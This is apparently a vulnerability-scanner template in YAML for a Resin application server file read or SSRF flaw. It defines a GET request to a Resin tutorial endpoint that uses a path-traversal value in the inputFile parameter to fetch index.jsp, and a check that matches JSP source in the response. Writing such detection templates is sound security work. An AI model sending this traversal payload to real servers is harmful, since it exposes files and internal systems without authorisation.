漏洞描述
resin inputfile fileread or ssrf
id: resin-inputfile-fileread-or-ssrf
info:
name: resin inputfile fileread
author: whynot
severity: high
verified: true
description: |-
resin inputfile fileread or ssrf
tags: resin,fileread,ssrf
created: 2023/08/13
rules:
r0:
request:
method: GET
path: /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp
expression: response.status == 200 && response.body.bcontains(bytes("<%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %>"))
expression: r0()